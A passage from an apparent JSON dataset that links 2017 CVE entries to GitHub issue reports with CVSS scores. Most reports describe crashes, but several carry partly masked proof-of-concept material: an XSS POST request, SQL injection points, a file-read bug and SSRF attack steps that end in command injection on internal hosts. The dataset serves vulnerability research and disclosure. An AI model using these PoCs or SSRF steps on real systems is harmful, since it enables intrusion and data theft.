  10889. "description": "Does WC have a directory traversal vulnerability? Hi there! A user brought this to our attention: URLTAG > The APITAG plugin through NUMBERTAG for APITAG has a Directory Traversal Vulnerability via a PATHTAG URI, which accesses a parent directory. Allegedly, \"When you dork with this, it will generate juicy information in the parent directory; for best practice filter according to the country URLTAG .\"",
  10890. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10891. "severity": "HIGH",
  10892. "baseScore": 7.5,
  10893. "impactScore": 3.6,
  10894. "exploitabilityScore": 3.9
  10895. },
  10896. {
  10897. "CVE_ID": "CVE-2017-17059",
  10898. "Issue_Url_old": "https://github.com/NaturalIntelligence/wp-thumb-post/issues/1",
  10899. "Issue_Url_new": "https://github.com/naturalintelligence/wp-thumb-post/issues/1",
  10900. "Repo_new": "naturalintelligence/wp-thumb-post",
  10901. "Issue_Created_At": "2017-11-23T08:21:21Z",
  10902. "description": "APITAG APITAG NUMBERTAG Cross Site Scripting. The XSS is reflected because the values are not filtered correctly: APITAG Line NUMBERTAG APITAG \"> APITAG Line NUMBERTAG APITAG \"> [POC] POST PATHTAG (\"XSS\") APITAG NUMBERTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Upgrade Insecure Requests NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Encoding: gzip, deflate, br Accept Language: es ES,es;q NUMBERTAG Cookie: Connection: close Content Type: application/x www form urlencoded Content Length NUMBERTAG amty_hidden NUMBERTAG",
  10903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10904. "severity": "MEDIUM",
  10905. "baseScore": 6.1,
  10906. "impactScore": 2.7,
  10907. "exploitabilityScore": 2.8
  10908. },
  10909. {
  10910. "CVE_ID": "CVE-2017-17102",
  10911. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/9",
  10912. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/9",
  10913. "Repo_new": "fiyocms/fiyocms",
  10914. "Issue_Created_At": "2017-12-03T08:14:32Z",
  10915. "description": "SQL injection in APITAG NUMBERTAG. Good day. I found a SQL injection vulnerability in APITAG APITAG. This vulnerability allows remote attackers to obtain information in the context of the database user the application uses to retrieve data. No login is required to exploit it: the vulnerable code is reachable unauthenticated. File location: FILETAG CODETAG Note that the function check_permalink puts the $_REQUEST['link'] parameter into the database query without filtering. File: FILETAG ERRORTAG POC:",
  10916. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10917. "severity": "HIGH",
  10918. "baseScore": 7.5,
  10919. "impactScore": 3.6,
  10920. "exploitabilityScore": 3.9
  10921. },
  10922. {
  10923. "CVE_ID": "CVE-2017-17103",
  10924. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/10",
  10925. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/10",
  10926. "Repo_new": "fiyocms/fiyocms",
  10927. "Issue_Created_At": "2017-12-03T13:35:20Z",
  10928. "description": "An UPDATE-statement SQL injection in APITAG NUMBERTAG. Good day. I found an UPDATE-type SQL injection vulnerability in APITAG APITAG. This vulnerability can be used to elevate a normal user's privileges to administrator. The vulnerability lies in PATHTAG CODETAG It can be seen that these two $_POST parameters FILETAG are the injection point (see the PoC). PoC: CODETAG FILETAG",
  10929. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10930. "severity": "HIGH",
  10931. "baseScore": 8.8,
  10932. "impactScore": 5.9,
  10933. "exploitabilityScore": 2.8
  10934. },
  10935. {
  10936. "CVE_ID": "CVE-2017-17104",
  10937. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/11",
  10938. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/11",
  10939. "Repo_new": "fiyocms/fiyocms",
  10940. "Issue_Created_At": "2017-12-03T14:42:32Z",
  10941. "description": "Arbitrary file read vulnerability in APITAG NUMBERTAG. Hi, I found an arbitrary file read vulnerability in APITAG NUMBERTAG. It may lead to the leakage of sensitive information. File: PATHTAG CODETAG It can be seen that $file is built by concatenating the $_GET parameter FILETAG",
  10942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10943. "severity": "HIGH",
  10944. "baseScore": 7.5,
  10945. "impactScore": 3.6,
  10946. "exploitabilityScore": 3.9
  10947. },
  10948. {
  10949. "CVE_ID": "CVE-2017-17439",
  10950. "Issue_Url_old": "https://github.com/heimdal/heimdal/issues/353",
  10951. "Issue_Url_new": "https://github.com/heimdal/heimdal/issues/353",
  10952. "Repo_new": "heimdal/heimdal",
  10953. "Issue_Created_At": "2017-12-05T11:47:32Z",
  10954. "description": "Remote unauthenticated APITAG in Heimdal KDC NUMBERTAG The following was reported in the Debian bug tracker at CVETAG heimdal kdc NUMBERTAG is regularly observed to crash due to malformed client names in client requests received over the internet. APITAG This leads to a segfault: ERRORTAG The related code is in PATHTAG APITAG Proposed patch: APITAG It would be good to have this fix, or another one, approved quickly so we can get a patch in Debian's security release.",
  10955. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10956. "severity": "HIGH",
  10957. "baseScore": 7.5,
  10958. "impactScore": 3.6,
  10959. "exploitabilityScore": 3.9
  10960. },
  10961. {
  10962. "CVE_ID": "CVE-2017-17479",
  10963. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1044",
  10964. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1044",
  10965. "Repo_new": "uclouvain/openjpeg",
  10966. "Issue_Created_At": "2017-12-08T07:29:36Z",
  10967. "description": "Similar vulnerable functions related to CVETAG . There are two functions similar to vulnerable function with id CVETAG CVETAG url with issue id NUMBERTAG Below is the patch for CVETAG . URLTAG URLTAG FILETAG Below are two functions that similar to the vulnerable function NUMBERTAG PATHTAG (pgxtovolume) ERRORTAG FILETAG NUMBERTAG PATHTAG (pgxtoimage) ERRORTAG FILETAG I think there are vulnerabilities in those two functions, too. Therefore, there should be patches for those two functions.",
  10968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10969. "severity": "CRITICAL",
  10970. "baseScore": 9.8,
  10971. "impactScore": 5.9,
  10972. "exploitabilityScore": 3.9
  10973. },
  10974. {
  10975. "CVE_ID": "CVE-2017-17484",
  10976. "Issue_Url_old": "https://github.com/znc/znc/issues/1459",
  10977. "Issue_Url_new": "https://github.com/znc/znc/issues/1459",
  10978. "Repo_new": "znc/znc",
  10979. "Issue_Created_At": "2017-11-21T10:48:01Z",
  10980. "description": "\"stack smashing\" segmentation fault with znc git on arm NUMBERTAG h. I'm running znc git from the AUR on my ODROID XU4, running Arch Linux ARM, after adding arm NUMBERTAG h to the architecture field. Things were fine until I decided to update/rebuild yesterday. After between NUMBERTAG m NUMBERTAG h of being online, the service suddenly stops. ERRORTAG Since this kept happening, I rebuilt the package again with debug symbols and have posted below the coredump. systemd coredump URLTAG I would report this in IRC, but none of my clients are set up for direct connection, only through my ZNC session. If there's any additional info which would be helpful, please just ask; I'll be more than happy to generate/provide it.",
  10981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10982. "severity": "CRITICAL",
  10983. "baseScore": 9.8,
  10984. "impactScore": 5.9,
  10985. "exploitabilityScore": 3.9
  10986. },
  10987. {
  10988. "CVE_ID": "CVE-2017-17485",
  10989. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1855",
  10990. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1855",
  10991. "Repo_new": "fasterxml/jackson-databind",
  10992. "Issue_Created_At": "2017-12-12T06:24:38Z",
  10993. "description": "Placeholder for continuing serialization gadget fixing. Placeholder for further inclusions, to be included in NUMBERTAG",
  10994. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10995. "severity": "CRITICAL",
  10996. "baseScore": 9.8,
  10997. "impactScore": 5.9,
  10998. "exploitabilityScore": 3.9
  10999. },
  11000. {
  11001. "CVE_ID": "CVE-2017-17497",
  11002. "Issue_Url_old": "https://github.com/htacg/tidy-html5/issues/656",
  11003. "Issue_Url_new": "https://github.com/htacg/tidy-html5/issues/656",
  11004. "Repo_new": "htacg/tidy-html5",
  11005. "Issue_Created_At": "2017-12-09T05:48:31Z",
  11006. "description": "Segmentation Fault. Description: The root cause is an invalid memory access. The variable APITAG (at line NUMBERTAG in clean.c) is modified in the loop, but the new value is not checked for validity. On the next loop iteration, APITAG->next is invalid, so dereferencing it causes the segmentation fault. Version APITAG Backtrace: CODETAG GDB Information CODETAG APITAG Contact me if you need the PoC file at APITAG or APITAG",
  11007. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11008. "severity": "HIGH",
  11009. "baseScore": 7.5,
  11010. "impactScore": 3.6,
  11011. "exploitabilityScore": 3.9
  11012. },
  11013. {
  11014. "CVE_ID": "CVE-2017-17504",
  11015. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/872",
  11016. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/872",
  11017. "Repo_new": "imagemagick/imagemagick",
  11018. "Issue_Created_At": "2017-11-21T05:39:48Z",
  11019. "description": "heap buffer overflow in Magick_png_read_raw_profile. $ convert version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg pangocairo png x xml zlib commit: APITAG compile at ubuntu NUMBERTAG Trigger Command: convert Magick_png_read_raw_profile heap overflow /dev/null ERRORTAG testcase: URLTAG",
  11020. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11021. "severity": "MEDIUM",
  11022. "baseScore": 6.5,
  11023. "impactScore": 3.6,
  11024. "exploitabilityScore": 2.8
  11025. },
  11026. {
  11027. "CVE_ID": "CVE-2017-17562",
  11028. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/249",
  11029. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/249",
  11030. "Repo_new": "embedthis/goahead",
  11031. "Issue_Created_At": "2017-06-09T19:11:15Z",
  11032. "description": "CGI environment variables need a prefix. CGI variables from request queries and from POST data are passed to CGI programs as environment variables. These variables correspond to the user parameters. Because they are exported without a prefix, a request can set or override environment variables that the CGI program or its runtime interprets, rather than only passing user parameters; a prefix needs to be applied to avoid clashing with standard environment variables.",
  11033. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11034. "severity": "HIGH",
  11035. "baseScore": 8.1,
  11036. "impactScore": 5.9,
  11037. "exploitabilityScore": 2.2
  11038. },
  11039. {
  11040. "CVE_ID": "CVE-2017-17665",
  11041. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4073",
  11042. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4073",
  11043. "Repo_new": "octopusdeploy/issues",
  11044. "Issue_Created_At": "2017-12-13T05:23:03Z",
  11045. "description": "Machine update process doesn't check that the user has access to all environments. When an authenticated user has access to one environment that a machine is scoped to, they can modify that machine's scope and add further environments to it, because the update process does not verify that the user has access to every environment in the resulting scope; this lets them escalate their access.",
  11046. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11047. "severity": "HIGH",
  11048. "baseScore": 8.8,
  11049. "impactScore": 5.9,
  11050. "exploitabilityScore": 2.8
  11051. },
  11052. {
  11053. "CVE_ID": "CVE-2017-17669",
  11054. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/187",
  11055. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/187",
  11056. "Repo_new": "exiv2/exiv2",
  11057. "Issue_Created_At": "2017-12-10T07:21:36Z",
  11058. "description": "heap buffer overflow in APITAG Description There is a heap buffer overflow vulnerability in Exi NUMBERTAG The command is: ./exi NUMBERTAG POC Stack trace with asan: ERRORTAG Author Credit to Young_X MENTIONTAG IIE",
  11059. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11060. "severity": "MEDIUM",
  11061. "baseScore": 5.5,
  11062. "impactScore": 3.6,
  11063. "exploitabilityScore": 1.8
  11064. },
  11065. {
  11066. "CVE_ID": "CVE-2017-17680",
  11067. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/873",
  11068. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/873",
  11069. "Repo_new": "imagemagick/imagemagick",
  11070. "Issue_Created_At": "2017-11-22T08:24:45Z",
  11071. "description": "memory leak in APITAG memory. $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leak /dev/null ERRORTAG testcase: URLTAG",
  11072. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11073. "severity": "MEDIUM",
  11074. "baseScore": 6.5,
  11075. "impactScore": 3.6,
  11076. "exploitabilityScore": 2.8
  11077. },
  11078. {
  11079. "CVE_ID": "CVE-2017-17681",
  11080. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/869",
  11081. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/869",
  11082. "Repo_new": "imagemagick/imagemagick",
  11083. "Issue_Created_At": "2017-11-20T02:12:03Z",
  11084. "description": "CPU exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG when debug we found a infinite loop in the following code (coders/psd.c). APITAG is always NUMBERTAG CODETAG testcase: URLTAG",
  11085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11086. "severity": "MEDIUM",
  11087. "baseScore": 6.5,
  11088. "impactScore": 3.6,
  11089. "exploitabilityScore": 2.8
  11090. },
  11091. {
  11092. "CVE_ID": "CVE-2017-17682",
  11093. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/870",
  11094. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/870",
  11095. "Repo_new": "imagemagick/imagemagick",
  11096. "Issue_Created_At": "2017-11-20T02:37:26Z",
  11097. "description": "cpu exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG When debug we found a very large number in APITAG ERRORTAG testcase: URLTAG",
  11098. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11099. "severity": "MEDIUM",
  11100. "baseScore": 6.5,
  11101. "impactScore": 3.6,
  11102. "exploitabilityScore": 2.8
  11103. },
  11104. {
  11105. "CVE_ID": "CVE-2017-17697",
  11106. "Issue_Url_old": "https://github.com/vmware/harbor/issues/3755",
  11107. "Issue_Url_new": "https://github.com/goharbor/harbor/issues/3755",
  11108. "Repo_new": "goharbor/harbor",
  11109. "Issue_Created_At": "2017-12-07T09:51:21Z",
  11110. "description": "There is a SSRF security vulnerability. hello developers, there is a security vulnerability in file PATHTAG in APITAG function, in endpoint parameter\uff0cresult in a SSRF . SSRF \u00ad Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet The last place to send a request at file PATHTAG APITAG function ERRORTAG Send the request is as follows\uff1a > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Connection: keep alive > Content Length NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Origin: FILETAG > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded > Referer: URLTAG > Accept Encoding: gzip, deflate, br > Accept Language: zh CN,zh;q NUMBERTAG Cookie: language=zh CN; APITAG > > APITAG Send the request, the server will request URLTAG the port NUMBERTAG open or not open then Return different content, And lead to information disclosure FILETAG FILETAG APITAG \u00a0\u00a0attack\u00a0\u00a0steps NUMBERTAG Scan internal network to determine internal infrastructure which you may access NUMBERTAG Collect opened ports at localhost and other internal hosts which you want (basically by time\u00adbased determination NUMBERTAG Determine services/daemons on ports using wiki or daemons banners (if you may watch output NUMBERTAG Determine type of you SSRF combination: \u25cb Direct socket access (such as this example) \u25cb Sockets client (such as java URI, cURL, LWP, others NUMBERTAG In case of direct socket access determine CRLF and other injections for smuggling NUMBERTAG In case of sockets client, determine available URI schemas NUMBERTAG Compare available schemas and services/daemons protocols to find smuggling possibilities NUMBERTAG Determine host\u00adbased auth daemons and try to exploit it if there is a remote command execution vulnerability of the host in 
internal network\uff0cWe can use this vulnerability into Intranet\uff0cexample\uff1a > URLTAG the host in intranet will execute the command $( PATHTAG ) Vulnerability of SSRF bible Cheatsheet\uff1a FILETAG",
  11111. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  11112. "severity": "HIGH",
  11113. "baseScore": 8.6,
  11114. "impactScore": 4.0,
  11115. "exploitabilityScore": 3.9
  11116. },
  11117. {
  11118. "CVE_ID": "CVE-2017-17718",
  11119. "Issue_Url_old": "https://github.com/ruby-ldap/ruby-net-ldap/issues/258",
  11120. "Issue_Url_new": "https://github.com/ruby-ldap/ruby-net-ldap/issues/258",
  11121. "Repo_new": "ruby-ldap/ruby-net-ldap",
  11122. "Issue_Created_At": "2016-01-14T16:19:29Z",
  11123. "description": "LDAPS vulnerable to MITM failure to validate hostname against CN or SAN in NUMBERTAG Cert. There are noted TLS/SSL limitations in the documented parts of the code and the info about encryption URLTAG . Technically, TLS/SSL also provides the ability to authenticate servers by matching the hostname to a CN (common name) or a (SAN) Subject Alternative Name and from what I've seen, while net ldap notes the certificate and trust chain limitations and insecure default, but it doesn't note the extra step needed to get to proper LDAP server authentication via LDAPS. CODETAG The above advice is not sufficient. It only assures that a server has a valid cert which was signed by a trusted CA, but it does not provide proof that it's the correct server E.g. APITAG could with a cert issued as APITAG could still impersonate APITAG to steal credentials. In addition to the above suggtestion setting a more secure and sane TLS/SSL context that validates certs , the net ldap lib should also, probably by default, add and make use of verify_certificate_identity URLTAG . I've browsed FILETAG and don't see anything that checks the hostname (FQDN) is authenticated against the certficate. ERRORTAG Given ruby essentially 'wraps' APITAG this Hostname_validation URLTAG reference also highlights the issue, with a choice extract > One common mistake made by users of APITAG is to assume that APITAG will validate the hostname in the server's certificate. Versions prior to NUMBERTAG did not perform hostname validation. Version NUMBERTAG and up contain support for hostname validation, but they still require the user to call a few functions to set it up.",
  11124. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  11125. "severity": "MEDIUM",
  11126. "baseScore": 5.9,
  11127. "impactScore": 3.6,
  11128. "exploitabilityScore": 2.2
  11129. },
  11130. {
  11131. "CVE_ID": "CVE-2017-17724",
  11132. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/263",
  11133. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/263",
  11134. "Repo_new": "exiv2/exiv2",
  11135. "Issue_Created_At": "2018-04-04T08:16:47Z",
  11136. "description": "out bound reads which could result to segmentfault. there are other testcases to trigger out of bound read with the commands (exi NUMBERTAG pv $POC), some debug information as follows: exi NUMBERTAG pv $POC Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG e RB NUMBERTAG ffff NUMBERTAG a2ed NUMBERTAG e2e2e ('...') RC NUMBERTAG RD NUMBERTAG f1fe RSI NUMBERTAG ffffffff RDI NUMBERTAG RBP NUMBERTAG fffffff2ce NUMBERTAG fffffff2ec NUMBERTAG fffffff NUMBERTAG a NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG RSP NUMBERTAG fffffff2c NUMBERTAG ff7fe NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [rax]) R NUMBERTAG R NUMBERTAG fe NUMBERTAG R NUMBERTAG ffff NUMBERTAG R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a2ac NUMBERTAG ASCII') R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG c NUMBERTAG b APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rax,QWORD PTR [rbp NUMBERTAG b NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add rax,rd NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [ra NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG cmp al NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG a APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG jne NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned ch ar const , unsigned long, unsigned int NUMBERTAG ffff NUMBERTAG c NUMBERTAG c APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov eax,DWORD PTR [rbp 
NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rdx,QWORD PTR [rbp NUMBERTAG b8] [ stack NUMBERTAG fffffff2c NUMBERTAG ff7fe NUMBERTAG fffffff2c NUMBERTAG f NUMBERTAG fffffff2c NUMBERTAG e NUMBERTAG a NUMBERTAG fffffff2c NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb NUMBERTAG fffffff2c NUMBERTAG fffffff2c NUMBERTAG f1fef NUMBERTAG e NUMBERTAG fffffff2c NUMBERTAG ff8 ('.' <repeats NUMBERTAG times NUMBERTAG fffffff2c NUMBERTAG ffffbad NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG c NUMBERTAG in APITAG (out=..., bytes NUMBERTAG e NUMBERTAG I \", size NUMBERTAG f4, depth NUMBERTAG f) at APITAG NUMBERTAG while ( bytes[i NUMBERTAG c && i APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG RDI NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb8) RBP NUMBERTAG fffffffd NUMBERTAG fffffffdb NUMBERTAG fffffffdd NUMBERTAG fffffffdf NUMBERTAG fffffffdf NUMBERTAG fffffffdfe0 ( > ...) 
RSP NUMBERTAG fffffffd8a NUMBERTAG f7fe NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [rax]) R NUMBERTAG R NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG R NUMBERTAG e ('^') R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a2ac NUMBERTAG ASCII') R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rax,QWORD PTR [rbp NUMBERTAG b NUMBERTAG ffff NUMBERTAG bf3e APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add rax,rd NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [ra NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG cmp al NUMBERTAG c NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG jne NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG ffff NUMBERTAG bf NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add DWORD PTR [rbp NUMBERTAG bc NUMBERTAG ffff NUMBERTAG bf4f APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG bc] [ stack NUMBERTAG fffffffd8a NUMBERTAG f7fe NUMBERTAG fffffffd8a NUMBERTAG fffffffd8b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG NUMBERTAG fffffffd8b NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb NUMBERTAG fffffffd8c NUMBERTAG fffffffd8c NUMBERTAG ff0f6d NUMBERTAG fffffffd8d NUMBERTAG d NUMBERTAG 
b0c NUMBERTAG fffffffd8d NUMBERTAG ffffbad NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG bf NUMBERTAG in APITAG (out=..., bytes NUMBERTAG d NUMBERTAG I PATHTAG size NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG while ( i APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dee9 in _start () ================== the pocs please refer to : URLTAG URLTAG",
  11137. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11138. "severity": "MEDIUM",
  11139. "baseScore": 6.5,
  11140. "impactScore": 3.6,
  11141. "exploitabilityScore": 2.8
  11142. },
  11143. {
  11144. "CVE_ID": "CVE-2017-17725",
  11145. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/188",
  11146. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/188",
  11147. "Repo_new": "exiv2/exiv2",
  11148. "Issue_Created_At": "2017-12-12T14:27:30Z",
  11149. "description": "exi NUMBERTAG library: heap buffer overflow in APITAG APITAG Description on exi NUMBERTAG the latest version): there is a heap based buffer overflow in the APITAG function APITAG which can be triggered by crafted tiff file. Note that this vulnerability is different from CVETAG (issue NUMBERTAG which is a an invalid memory address dereference. PATHTAG APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG f NUMBERTAG de bp NUMBERTAG ffee NUMBERTAG c NUMBERTAG sp NUMBERTAG ffee NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG f NUMBERTAG dd in APITAG char const , APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d2c in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e2e7 in APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG cd NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG faed6b2 in operator APITAG long) ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG char const , APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa 